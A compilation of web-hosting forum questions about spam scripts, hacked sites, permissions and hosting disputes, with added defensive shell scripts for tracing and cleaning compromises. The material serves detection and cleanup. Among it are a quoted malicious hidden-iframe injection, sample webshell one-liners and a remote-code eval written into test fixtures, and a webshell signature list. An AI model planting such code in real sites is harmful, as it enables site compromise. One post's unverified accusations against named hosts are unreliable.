How To Find How And Who Uploaded Files - Spam - Action I Can Take
Mar 27, 2009
I have a dedicated server, the server itself is secure (as far as I know) and I run lots of my sites from it. I offered a friend hosting for his flash based chat application he built.
Today I was contacted by someone; "Are you the owner of xxxx.net?" so I informed them that yes, it was my server, and they then showed me an email they'd received from my server. I did a search and apparently someone uploaded mail.php and a couple of files it was using to send out spam based upon a variety of conditions that the other files met. The files contained forenames and surnames; it'd use a forename and a surname, then send it to popular free mail services. The email contained ramblings about the new world order and promoted a website.
How can I find out how they got the files uploaded to the account, and what action can I take? I checked the whois for the domain and have their contact information; however, it's a large site so I'm doubtful that the owner did it. I don't want my server's IPs being blacklisted for spam :|
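Added example, not part of the original post: the usual way to answer "how did mail.php get there" is to take the dropped file's modification time and look in the web server's access log for the request that landed just before it, typically a POST to whatever upload handler the chat application exposes. The script below does that correlation on a constructed combined-format log; `/chat/upload.php` and `/chat/uploads/mail.php` are hypothetical paths.

```shell
#!/bin/bash
# Added example, not part of the original post: correlate the dropped file's
# modification time with the web server's access log to find the request that
# planted it. The access-log lines below are constructed (combined log
# format); /chat/upload.php and /chat/uploads/mail.php are hypothetical paths.

# Files under DIR modified within the last MINUTES minutes. Run it against the
# docroot and look at what landed just before mail.php.
recent_files() {  # recent_files DIR MINUTES
    find "$1" -type f -mmin "-$2"
}

# Every POST to PATH in a combined-format log (query strings allowed).
posts_to() {  # posts_to LOG PATH
    grep -E "\"POST $2(\?[^ ]*)? HTTP/" "$1"
}

# Client IPs that POSTed to the upload endpoint and afterwards requested the
# dropped file: the upload plus the first call of the script, from one source.
suspect_ips() {  # suspect_ips LOG UPLOAD_PATH DROPPED_PATH
    posts_to "$1" "$2" | awk '{print $1}' | sort -u | while read -r ip; do
        grep -q "^$ip .*\"GET $3" "$1" && printf '%s\n' "$ip"
    done
    return 0
}

# Constructed sample log: one legitimate uploader and one who then fetched
# the dropped script.
LOG=$(mktemp); trap 'rm -f "$LOG"' EXIT
cat >"$LOG" <<'EOF'
203.0.113.7 - - [27/Mar/2009:02:11:09 +0000] "POST /chat/upload.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"
203.0.113.7 - - [27/Mar/2009:02:11:15 +0000] "GET /chat/uploads/mail.php HTTP/1.1" 200 45 "-" "Mozilla/4.0"
198.51.100.4 - - [27/Mar/2009:02:20:01 +0000] "POST /chat/upload.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Mar/2009:02:20:05 +0000] "GET /chat/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF

echo "POSTs to the upload endpoint:"; posts_to "$LOG" /chat/upload.php
echo "Suspect source IPs:"; suspect_ips "$LOG" /chat/upload.php /chat/uploads/mail.php
```

On the real box, `recent_files /var/www 1440` narrows the window, then `posts_to` over the rotated logs for that day gives the upload request and the source address; the same address fetching the dropped script afterwards is the confirmation. Logs only tell you the entry point if the upload went over HTTP; if nothing is there, the FTP transfer log and the other accounts on the server are the next places to look.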
I used to have my Apache 1.3.37 with PHP compiled as a CGI. Whenever I have a PHP script (say vBulletin forum software) that allows file uploads, files will be uploaded with the correct userid and groupid on the server. However, once I compiled PHP as an ISAPI module, the files will be uploaded but will be owned by 'nobody'. Of course I can log in as root and chown it back to the right user, but it's a hassle if there are multiple user accounts on the server and they're using PHP software on their end. If someone is using an FTP program and tries to overwrite that uploaded file that's owned by nobody, it will not let them do so. Is there a way to fix this, or change the config files in a way that would fix it?
I am wanting to know if there is a way to stop files being uploaded to my VPS, via FTP, cPanel, etc., that are malicious.
I have been told there is a way to do this but I haven't been told how.
Basically I want to know if there is something where I can add a list of keywords that are in the malicious files, and whatever it is will stop them from being uploaded, or if they manage to get uploaded onto my VPS will it make them not work?
I am looking into this as I had an issue before where someone uploaded a shell onto my server :@ luckily it didn't cause any damage, or he didn't get anywhere, but I still want to be safe.
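Added example, not part of the original post: the "list of keywords" idea is a content scan for the constructs webshells depend on. The script below implements that scan over an upload directory and, separately, flags files with harmless extensions that carry a PHP open tag, which is how shells get past an extension whitelist. The signature list and the sample directory are constructed; obfuscated shells will slip past any such list, so treat a clean result as "nothing obvious".

```shell
#!/bin/bash
# Added example, not part of the original post: a keyword scan for the PHP
# constructs most webshells rely on, plus a check for PHP hiding inside files
# with harmless extensions. The signature list is a heuristic (obfuscated
# shells evade it); the sample upload directory is constructed.

# Regex for common backdoor idioms: eval/base64 loaders, command execution,
# "variable functions" called straight from request input, the /e modifier.
SHELL_SIGS='eval[[:space:]]*\(|base64_decode[[:space:]]*\(|(system|passthru|shell_exec|exec|popen|proc_open)[[:space:]]*\(|\$_(GET|POST|REQUEST|COOKIE)\[[^]]+\][[:space:]]*\(|preg_replace[[:space:]]*\(.*/e[^a-zA-Z]|c99shell|r57shell'

# Files under DIR matching any signature (text files only, -I skips binaries).
scan_uploads() {  # scan_uploads DIR
    grep -rlIE "$SHELL_SIGS" "$1" 2>/dev/null | sort
}

# Files that are not *.php yet contain a PHP open tag: a classic way to
# smuggle code past an extension whitelist, executed later via a second bug.
disguised_php() {  # disguised_php DIR
    find "$1" -type f ! -name '*.php' -exec grep -lE '<\?(php|=)' {} + 2>/dev/null | sort
}

# Constructed sample upload directory.
D=$(mktemp -d); trap 'rm -rf "$D"' EXIT
printf '<?php echo "hello"; ?>\n' >"$D/index.php"
printf '<?php eval(base64_decode($_POST["p"])); ?>\n' >"$D/backdoor.php"
printf 'GIF89a\n<?php system($_GET["c"]); ?>\n' >"$D/avatar.gif"
printf 'plain text\n' >"$D/readme.txt"

echo "Signature hits:"; scan_uploads "$D"
echo "PHP in non-PHP files:"; disguised_php "$D"
```

The second half of the question, "make them not work if they do get uploaded", is the more reliable control: under Apache with mod_php, a `<Directory>` block for the upload tree with `php_admin_flag engine off` (or, on Apache 2.4, a `<FilesMatch "\.php$">` with `Require all denied`) means a dropped shell is served as text instead of executed, whatever the scanner missed.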
I have a plain RHEL 4 server, and I'm using the vsftpd server. I cannot find an option to specify the max size for uploaded files... does anybody know something about this?
I've recently started experiencing some issues where files uploaded through Joomla or some other scripts (mostly PHP) inherit a permission of 600. Prior to updates being done on the server I'm hosted on, uploaded files received 644 permissions and all things worked great.
I've checked the umask assigned to the shell (022) and have ruled that out as a problem.
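Added example, not part of the original post: the shell umask is the wrong place to look because the uploaded file never goes through it. PHP writes an upload to a temp file created with mkstemp(), which is always mode 0600, and move_uploaded_file() renames that file into place; a rename keeps the mode. When the temp directory sits on a different filesystem, the fallback is a copy, which does go through the umask and yields 644, which is the likely reason the same code gave 644 before a server change and 600 after. The script reproduces both paths with mktemp and mv in a temp directory.

```shell
#!/bin/bash
# Added example, not part of the original post: why the uploaded file ends up
# 0600. PHP writes an upload to a temp file created by mkstemp(), which is
# always mode 0600, and move_uploaded_file() renames it into place; a rename
# keeps the mode, so the umask never gets a say. mktemp + mv reproduce that.

file_mode() {  # octal mode, GNU stat first, BSD stat as fallback
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

WORK=$(mktemp -d); trap 'rm -rf "$WORK"' EXIT

# A file the server creates directly goes through the umask: 022 -> 644.
mode_via_umask() {
    (umask 022; : >"$WORK/direct.txt")
    file_mode "$WORK/direct.txt"
}

# The upload path: mkstemp-style temp file (0600), then rename. Still 600.
mode_after_rename() {
    local t
    t=$(umask 022; mktemp "$WORK/php.XXXXXX")
    mv "$t" "$WORK/renamed.jpg"
    file_mode "$WORK/renamed.jpg"
}

# The application-side fix: an explicit chmod after the move
# (in PHP, chmod($dest, 0644) right after move_uploaded_file()).
mode_after_fix() {
    chmod 644 "$WORK/renamed.jpg"
    file_mode "$WORK/renamed.jpg"
}

echo "created via umask: $(mode_via_umask)"      # 644
echo "temp + rename:     $(mode_after_rename)"   # 600
echo "after chmod:       $(mode_after_fix)"      # 644
```

For a CMS you do not control, the fix belongs in the application (Joomla and most upload libraries have a setting or hook for the post-upload chmod); anything that relies on the temp directory happening to be on another filesystem is an accident waiting to reverse itself.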
I have a web blog that shows promise of growing pretty big soon! This is a vBulletin with chatbox and arcade games. The forum is for gamers and game modification talk. I want to keep my features such as the in-forum mp3 player for streaming music. I host no files; everything is linked from outside sources. Even photos are linked from photo hosts. I foresee about 20-30 members on at all times browsing and chatting in the chatbox, playing in the online arcade!
I have no idea how much bandwidth all this will use up. I do know that 20-40 gig of space should be quite enough, but as always I want all I can get. As far as bandwidth, I have no idea what all those features will eat up.
I have looked at fatcow.com and talked to them; they said their unlimited is this: 300 gig space, 3000 gig bandwidth, and they do not keep up with msql databases. I looked on BBB and they have an A+ record; compared to HostGator, which has unsatisfactory! The only problem is they are yearly contract only. I do not trust this! I also have to let them re-bill me at the end of the year and this gives them access to my account. The payment options are check, PayPal, or credit.
Not long ago somebody hacked our customer's account through a vulnerability in the phpBB Album module and uploaded some scripts. Then it started to send Nigerian spam using exim and apache. These scripts were found and deleted and the Album module was fully deleted too. But when I look at the processes now I see that exim and httpd still start very often, so the system resources are probably overused by them...
I'm facing a serious problem with my qmail and Plesk 11.0.9. I found the way the spammer did it with my server by listening to everything on port 25. Maybe he knows the RCPT hosts of mine, and they send emails with random usernames but with a domain hosted on my Plesk (user1@mydomain.com, user2@mydomain.com, ... userxxx@mydomain.com).
qmail only checks the domain in RCPT if the spammer inputs "mail from user1@mydomain.com" (without ":") - no such email address on my server. Then the server replies: 550, no mailbox here by that name. (#5.7.17)
But qmail checks username and domain if the spammer inputs "mail from: user1@mydomain.com" (with ":") - no such email address on my server. Then the server replies: 250 OK. This is really weird! I tried with all my Plesk servers; this bug is still present.
My server was hacked. I can find some HTML and PHP files into which the hacker inserted code similar to the following:
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
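Added example, not part of the original post: because the src differs from file to file, the search has to key on what the injections share, which is an iframe hidden by style or by a 1x1 or 0x0 size. The script lists every web file carrying such an iframe and the distinct hosts they point at, so the whole infection can be catalogued before the site is restored from a clean backup. The sample files are constructed and use documentation addresses, not the host from the post; it assumes each injected tag sits on one line, which is how injectors write them.

```shell
#!/bin/bash
# Added example, not part of the original post: list every web file carrying a
# hidden iframe regardless of its src, and the distinct hosts those iframes
# point at, so the whole infection can be catalogued before restoring from a
# clean backup. Sample files are constructed; the hosts are documentation
# addresses, not the one in the post.

# Injected iframes are hidden by style or by (near-)zero size.
IFRAME_RE='<iframe[^>]*(visibility:[[:space:]]*hidden|display:[[:space:]]*none|width=["]?[01]["]?[[:space:]>]|height=["]?[01]["]?[[:space:]>])'

# Files under DIR containing a hidden iframe (case-insensitive; one tag per
# line is assumed, which is how injectors write them).
find_hidden_iframes() {  # find_hidden_iframes DIR
    grep -rliE --include='*.html' --include='*.htm' --include='*.php' --include='*.js' \
        "$IFRAME_RE" "$1" | sort
}

# Distinct host[:port] values used as src by the hidden iframes in DIR.
injected_hosts() {  # injected_hosts DIR
    find_hidden_iframes "$1" | while read -r f; do
        grep -oiE "<iframe[^>]*src=[\"']?https?://[^/\"' >]+" "$f"
    done | sed -E 's#.*://##' | sort -u
}

D=$(mktemp -d); trap 'rm -rf "$D"' EXIT
mkdir -p "$D/sub"
cat >"$D/index.html" <<'EOF'
<html><body><h1>Home</h1>
<iframe src="http://198.51.100.9:8080/ts/in.cgi?x" width=125 height=125 style="visibility: hidden"></iframe>
</body></html>
EOF
cat >"$D/sub/page.php" <<'EOF'
<?php include 'header.php'; ?>
<iframe src="http://malware.example/load.php" width=1 height=1></iframe>
EOF
printf '<html><body><iframe src="http://example.org/embed"></iframe></body></html>\n' >"$D/clean.html"

echo "Infected files:"; find_hidden_iframes "$D"
echo "Injected hosts:"; injected_hosts "$D"
```

The file list is also the list of what the attacker could write to; comparing those files' modification times against the FTP and web logs (the same way as for a dropped script) usually points at the account or credential that was used, which matters more than removing the tags, since the injection will be redone otherwise.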
Is there a way to get Apache to tell me which .conf file it is loading at start-up?
There's a box that's misbehaving and Apache is running on port 80 and 8080 on the box... but we can't locate *why* it's running on port 8080. I can't find any Listen 8080 statement in the typical config files. If I knew which config files it was loading, I could go through all of the files in more detail.
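Added example, not part of the original post: on recent Apache 2.4 builds the server answers this itself with `httpd -t -D DUMP_INCLUDES`, `httpd -V` prints the compiled-in SERVER_CONFIG_FILE, and the running process's arguments show whether it was started with an alternate `-f`; it is also worth confirming with `ss -ltnp` or `lsof -i :8080` that the 8080 listener really is this Apache and not a second instance. When the binary is older or cannot be run, the script below does the equivalent by walking Include/IncludeOptional directives from the root config and grepping every file in the loaded set for Listen. The config tree it runs on is constructed under a temp directory.

```shell
#!/bin/bash
# Added example, not part of the original post: walk Include/IncludeOptional
# directives from the root httpd.conf and print every file Apache would parse,
# then grep all of them for Listen. Recent Apache 2.4 builds can do this
# themselves (`httpd -t -D DUMP_INCLUDES`; `httpd -V` shows the compiled-in
# SERVER_CONFIG_FILE). The config tree below is constructed.

# Print CONF and, recursively, everything it includes. Relative paths are
# resolved against SERVER_ROOT; globs and directories expand as Apache does.
apache_config_files() {  # apache_config_files SERVER_ROOT CONF
    local root=$1 conf=$2 target f g
    [ -f "$conf" ] || return 0            # e.g. an IncludeOptional target that is absent
    printf '%s\n' "$conf"
    grep -iE '^[[:space:]]*Include(Optional)?[[:space:]]+' "$conf" |
        sed -E 's/^[[:space:]]*Include(Optional)?[[:space:]]+//; s/"//g; s/[[:space:]]+$//' |
        while read -r target; do
            case $target in /*) ;; *) target="$root/$target" ;; esac
            for f in $target; do              # unquoted on purpose: glob expansion
                if [ -d "$f" ]; then
                    for g in "$f"/*; do apache_config_files "$root" "$g"; done
                else
                    apache_config_files "$root" "$f"
                fi
            done
        done
}

# file:line:directive for every Listen in the whole loaded set.
find_listen() {  # find_listen SERVER_ROOT CONF
    apache_config_files "$1" "$2" | while read -r f; do
        grep -HnE '^[[:space:]]*Listen[[:space:]]' "$f"
    done
    return 0
}

ROOT=$(mktemp -d); trap 'rm -rf "$ROOT"' EXIT
mkdir -p "$ROOT/conf.d" "$ROOT/sites-enabled"
cat >"$ROOT/httpd.conf" <<EOF
ServerRoot "$ROOT"
Listen 80
Include conf.d/*.conf
IncludeOptional sites-enabled
IncludeOptional conf.d/absent.d/*.conf
EOF
printf 'LoadModule status_module modules/mod_status.so\n' >"$ROOT/conf.d/00-base.conf"
printf '# leftover from a proxy test\nListen 8080\n' >"$ROOT/sites-enabled/proxy.conf"

echo "Config files loaded:"; apache_config_files "$ROOT" "$ROOT/httpd.conf"
echo "Listen directives:"; find_listen "$ROOT" "$ROOT/httpd.conf"
```

Directories included whole (as `sites-enabled` is above) are where stray listeners usually hide, since a file dropped there by a package or a one-off test is never mentioned in the main config.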
We have just had reports of SPAM being sent from our CentOS 6.x server running Plesk 12.
Services like Plesk Premium Antivirus, SpamAssassin, watchdog (rkhunter) and mod_security are enabled on the server to enhance security, and none of these seemed to stop the scripts.
The issue is that multiple domains are sending out mail from this server, so it is difficult to find the script sending out SPAM. When we were running Plesk 11.0 we had a separate log file where we could see the file sending any mail going out from the postfix mail server. I have checked both /var/log/maillog and /usr/local/psa/var/log/maillog, but there is nothing in those files to tell me the file that sent the mail.
How would I go about finding this file from either the Plesk Control Panel or through SSH (using log-files)?
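Added example, not part of the original post: PHP itself can record the calling script. With `mail.add_x_header = On` and `mail.log = /var/log/php_mail.log` in php.ini (PHP 5.3 and later), every `mail()` call is logged with the script path and line, and each outgoing message carries an `X-PHP-Originating-Script` header, so a spam sample in hand also names its source. The script below tallies such a log per calling script, reports when the top offender first fired, and lists its recipients. The log lines are constructed in PHP's format; the vhost paths are hypothetical. This covers mail sent through `mail()`; a script that talks SMTP directly will not appear, and for that the postfix log's client address is the lead.

```shell
#!/bin/bash
# Added example, not part of the original post. With these two php.ini
# settings (PHP 5.3+), every mail() call is logged with the script and line
# that made it, and each message carries an X-PHP-Originating-Script header:
#   mail.add_x_header = On
#   mail.log = /var/log/php_mail.log
# This tallies that log per script so the spamming file stands out. The log
# lines are constructed in PHP's own format; the vhost paths are hypothetical.

# "count script" per calling script, busiest first.
top_mail_scripts() {  # top_mail_scripts LOG
    sed -nE 's/.*mail\(\) on \[([^]]+):[0-9]+\].*/\1/p' "$1" | sort | uniq -c | sort -rn |
        awk '{print $1, $2}'
}

# Timestamp of the first mail() from SCRIPT: tells you when the abuse began.
first_seen() {  # first_seen LOG SCRIPT
    grep -F "mail() on [$2:" "$1" | head -n 1 | sed -E 's/^\[([^]]+)\].*/\1/'
}

# Distinct recipients addressed by SCRIPT (dictionary-style names stand out).
recipients_of() {  # recipients_of LOG SCRIPT
    grep -F "mail() on [$2:" "$1" | sed -nE 's/.*\]: To: ([^ ]+) -- .*/\1/p' | sort -u
}

LOG=$(mktemp); trap 'rm -f "$LOG"' EXIT
cat >"$LOG" <<'EOF'
[27-Mar-2009 02:11:09 UTC] mail() on [/var/www/vhosts/shop.example/httpdocs/images/mail.php:17]: To: john.smith@example.net -- Headers: From: news@shop.example
[27-Mar-2009 02:11:10 UTC] mail() on [/var/www/vhosts/shop.example/httpdocs/images/mail.php:17]: To: jane.doe@example.org -- Headers: From: news@shop.example
[27-Mar-2009 02:12:00 UTC] mail() on [/var/www/vhosts/blog.example/httpdocs/wp-login.php:220]: To: admin@blog.example -- Headers: From: wordpress@blog.example
[27-Mar-2009 02:12:03 UTC] mail() on [/var/www/vhosts/shop.example/httpdocs/images/mail.php:17]: To: bob.jones@example.com -- Headers: From: news@shop.example
EOF

echo "mail() calls per script:"; top_mail_scripts "$LOG"
SPAMMER=$(top_mail_scripts "$LOG" | head -n 1 | awk '{print $2}')
echo "first seen: $(first_seen "$LOG" "$SPAMMER")"
echo "recipients:"; recipients_of "$LOG" "$SPAMMER"
```

A PHP file living under an images directory, as in the sample, is itself a tell; the "first seen" timestamp is what to carry over to the access log to find the request that put it there.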
I have an odd problem... after transferring several hundred .php files to one of our servers we noticed that the browser was showing "?" output only.
When I open the file in "vi" (we're running centos 5.x), I can see this at the end of the file:
Code:
... </HTML> ^@^@<?php //comment goes here ?>
I highlighted the problem text in red bold. If these four characters are removed from the file (edited out manually using vi) then the file displays and works correctly.
However.. there are several hundred of these files, and some have the problem and some don't.
I've tried everything I know to find which files contain the problem, but so far no luck.
i.e.:
grep -r "^@" .; grep -r "^@" .;
Basically.. I need to find any instance of these characters and then remove them.
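Added example, not part of the original post: the search fails because `^@` is only how vi displays a NUL byte; as a grep pattern it means "a literal @ at the start of a line", which matches nothing. The script below detects NUL bytes without relying on GNU-only `grep -P`, by comparing each file with a NUL-stripped copy of itself, and then cleans the affected files in place while keeping a backup. The sample files are constructed.

```shell
#!/bin/bash
# Added example, not part of the original post. vi displays a NUL byte as ^@,
# so grep "^@" looks for a literal "@" at the start of a line and matches
# nothing. This finds files containing NUL bytes by comparing each one with a
# NUL-stripped copy (no GNU-only grep -P needed), then cleans them in place.
# The sample files are constructed.

# Paths of *.php files under DIR that contain at least one NUL byte.
files_with_nul() {  # files_with_nul DIR
    find "$1" -type f -name '*.php' | while read -r f; do
        tr -d '\000' <"$f" | cmp -s - "$f" || printf '%s\n' "$f"
    done | sort
}

# Rewrite FILE without NUL bytes, keeping FILE.bak with the original mode.
strip_nul() {  # strip_nul FILE
    cp -p "$1" "$1.bak" && tr -d '\000' <"$1.bak" >"$1"
}

D=$(mktemp -d); trap 'rm -rf "$D"' EXIT
printf '<html>...</html>\000\000<?php // comment goes here ?>\n' >"$D/broken.php"
printf '<html>...</html>\n<?php // comment goes here ?>\n' >"$D/fine.php"

echo "Files with NUL bytes:"; files_with_nul "$D"
files_with_nul "$D" | while read -r f; do strip_nul "$f"; done
echo "After cleaning:"; files_with_nul "$D"     # prints nothing
```

NUL bytes at exactly that spot, between the HTML and a trailing PHP block, are worth a second look before cleaning: they are a common side effect of a broken transfer, but a `<?php` block appended after `</HTML>` on hundreds of files is also what injected code looks like, so compare one "comment goes here" block against the original source before bulk-stripping.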
I am being hacked and I don't know how they are getting files onto my server. They are doing it on two of my domains; I suspended one and then they got it on the other. My FTP access log does not show anything suspicious.
A company named [url] was with us for almost 4 months, and they were using servers which were custom-ordered high-end servers. We didn't take a setup fee just because they promised us they would stay for at least a year,
and for the past 2 months they have just run away somewhere and haven't paid any invoice. I guess we made a big mistake by believing in them.
I know these 2 servers won't make a big difference, but still, just for my info:
Can anyone suggest if we can take any legal action against them? I know their site is still up and running.
I would like to present to you a scenario I'm sure everybody has thought of and has come up against.
1. If you are hosting with a web host and your files and website have been compromised due to the lack of security on the server, what actions can you take against the host for this loss?
2. The host has a backup dating back a week, but of course the data you have accumulated for the week that was lost is very valuable, but you can't get it back now because of a flaw with the host's server. Is there anything you can do in a situation like this?
3. What if you are a reseller and have set up several sites for customers? One customer uses a CMS, which means he/she will be updating their website every now and then, and you are not always able to make backups of all the websites hosted by you as the reseller.
Now a week's or a few days' worth of data has been lost. The client complains and wants to take legal action against the reseller (you), and of course the reseller knows it's the problem of the main host you are hosting with. What does the reseller do now with the client and the host who's made the mistake?
4. A client's livelihood depends on his/her e-commerce website; they make an average turnover. Whether you are hosting on a dedicated or a VPS, nevertheless data loss has occurred because the box was compromised. The blame is put on the host. In a scenario like this what can the customer do? He/she has lost some client details/order information and products as a whole...? Remember this is a business... and money has been lost. A recovery backup a week old will never be sufficient for the loss.
Think about it... what will you do if any of the above four scenarios were to happen to you?
Yes, I am aware of the terms. Some hosts will say they are not responsible for data loss in their small print; some will say it is solely up to the customer to make backups. When it comes to court they will point this out, and you'll be kicking yourself for being so foolish as to go with a host in the first place which doesn't guarantee the safety of your data.
Customers don't always read the small print. Now, realistically speaking, what can the customer/client do in a situation like this? I'm guessing nothing if the host outlines the terms I've pointed out above?
Is there really a host out there which takes whole responsibility for the loss and damage they create to your websites and businesses online?
The worst hosting you can get is Hostdepartment.com followed by Webhostasp.com and then Vortechhosting.com. All these have major complaints online. Hostdepartment servers are down about 50/50. 50% of the time the server will have problems and downtime throughout the day. Maybe not down for hours, but the servers will drop from time to time maybe 10 minutes here and there. Also Ixwebhosting.com surprisingly has downtime. The server is actually currently down as this is being written. For those who wish to gather a class action lawsuit against hostdepartment, webhostasp or vortechhosting, you may contact me at cashzzz at hotmail. Alertra is a good tool for monitoring your site.
Well, with the apache-badbots jail activated I have in a short time a huge amount of banned IPs. The usual action for this is to use iptables-ipset-proto and save all these banned IPs in the ipset instead of, as normal, in the iptables list - that's also a suggestion which was discussed in the fail2ban forum for better performance. And yes, I had this running (ipset package installed) with my manual installation of fail2ban before I switched over to the Plesk-integrated one.
action = iptables-ipset-proto6[name=BadBots, port="http,https,7080,7081"] instead of action = iptables-multiport[name=BadBots, port="http,https,7080,7081"]
So how can I add iptables-ipset-proto4.conf, iptables-ipset-proto6-allports.conf, iptables-ipset-proto6.conf to the Plesk version of fail2ban?
Let's suppose you have a site on a shared hosting plan, and all of a sudden it gets a huge surge in traffic as a result of being featured in the news or something like that. What would be a good plan of action to deal with the surge quickly?
(ex. maybe your hosts takes the site offline from bandwidth overuse)
How can I do a search (probably using a regex) for all files whose names consist purely of numbers?
for e.g. find:
53243.php 24353.php 24098.php
(They always have 5 digits.)
It seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the PHP file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
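Added example, not part of the original post: with the name pattern this fixed, a portable `find` glob is enough and avoids the GNU-only `-regextype` option. The script lists every five-digit `.php` file, pulls the distinct hosts those files call back to (so the full set of command servers is known, not just the two already spotted), and moves the hits out of the document root while preserving their relative paths for later analysis. The sample tree is constructed; the two hosts are the ones named in the post.

```shell
#!/bin/bash
# Added example, not part of the original post: find every file named with
# exactly five digits plus .php, list the hosts those files call back to, and
# move the hits out of the document root in one pass while keeping their
# relative paths for later analysis. Sample files are constructed; the two
# hosts are the ones named in the post.

# Exact-name match with a portable glob (no GNU-only -regextype needed).
numeric_php_files() {  # numeric_php_files DIR
    find "$1" -type f -name '[0-9][0-9][0-9][0-9][0-9].php' | sort
}

# Distinct hosts referenced by URL inside those files.
callback_hosts() {  # callback_hosts DIR
    numeric_php_files "$1" | while read -r f; do
        grep -hoE 'https?://[A-Za-z0-9.-]+' "$f"
    done | sed -E 's#https?://##' | sort -u
}

# Move every hit from DIR into DEST, preserving its path relative to DIR.
quarantine() {  # quarantine DIR DEST
    numeric_php_files "$1" | while read -r f; do
        rel=${f#"$1"/}
        mkdir -p "$2/$(dirname "$rel")" && mv "$f" "$2/$rel"
    done
}

D=$(mktemp -d); Q=$(mktemp -d); trap 'rm -rf "$D" "$Q"' EXIT
mkdir -p "$D/images/cache"
printf '<?php echo file_get_contents("http://www3.rssnews.ws/feed?id=1"); ?>\n' >"$D/53243.php"
printf '<?php $r = file_get_contents("http://www3.xmldata.info/x.php"); eval($r); ?>\n' >"$D/images/cache/24098.php"
printf '<?php echo "real page"; ?>\n' >"$D/index.php"
printf '<?php echo "six digits, not a hit"; ?>\n' >"$D/123456.php"

echo "Dropped files:"; numeric_php_files "$D"
echo "Callback hosts:"; callback_hosts "$D"
```

`quarantine /home/account/public_html /root/quarantine` is the usage on a real account; keep the moved files rather than deleting them, since the earliest of them (by modification time) is the one to line up against the access and FTP logs to find how the script got to run in the first place.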
Does anyone know the proper avenue for cancelling an account with HostNine? They are giving me the run around and ignoring my requests for a cancellation. I originally tried to cancel my account a couple of months ago by e-mail. They informed me that I had to submit a cancellation request through their website. I have submitted a cancellation request through their website SEVERAL TIMES since then. They never sent me any kind of response or confirmation, so I assumed (wrongly, I guess) that the account was cancelled, but they keep charging my credit card over and over.
I have requested again that the account be cancelled and told them that I would simply perform a chargeback since they are basically billing me for a service that I have continually requested be cancelled via their own online cancellation form using their own process for cancelling accounts. Nick Hudson @ HostNine's response to this was to threaten that they would send attorneys and collection agencies after me. All while claiming that it is "NOT hard" to cancel an account. I agree with them; cancelling your account when the company will actually deal with you should not be hard.
I log in to FTP and I try to upload an updated file (the file already exists on the server). It prompts me to overwrite and I say yes, but when I refresh/check the site the page hasn't changed. I then tried uploading the file again and it still shows the existing file size (so I know it hasn't been replaced).
Any idea why it is not overwriting?
The files are chowned to the owner (FTP user), which is myself.